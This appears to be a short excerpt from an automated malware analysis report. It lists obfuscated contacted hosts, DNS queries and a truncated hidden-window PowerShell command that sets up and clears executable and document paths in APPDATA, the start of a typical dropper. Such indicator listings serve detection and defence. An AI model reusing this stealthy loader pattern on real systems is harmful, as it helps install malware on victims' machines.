Technical Information
- 'u.##knik.io':443
- 'x1.#.lencr.org':80
- 'fu###oshi.co.jp':443
- http://x1.#.lencr.org/
- 'u.##knik.io':443
- 'fu###oshi.co.jp':443
- DNS ASK u.##knik.io
- DNS ASK x1.#.lencr.org
- DNS ASK fu###oshi.co.jp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile $file = $env:APPDATA + '\YT8.exe';$nwPath = $env:APPDATA + '\H31.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $c...' (with hidden window)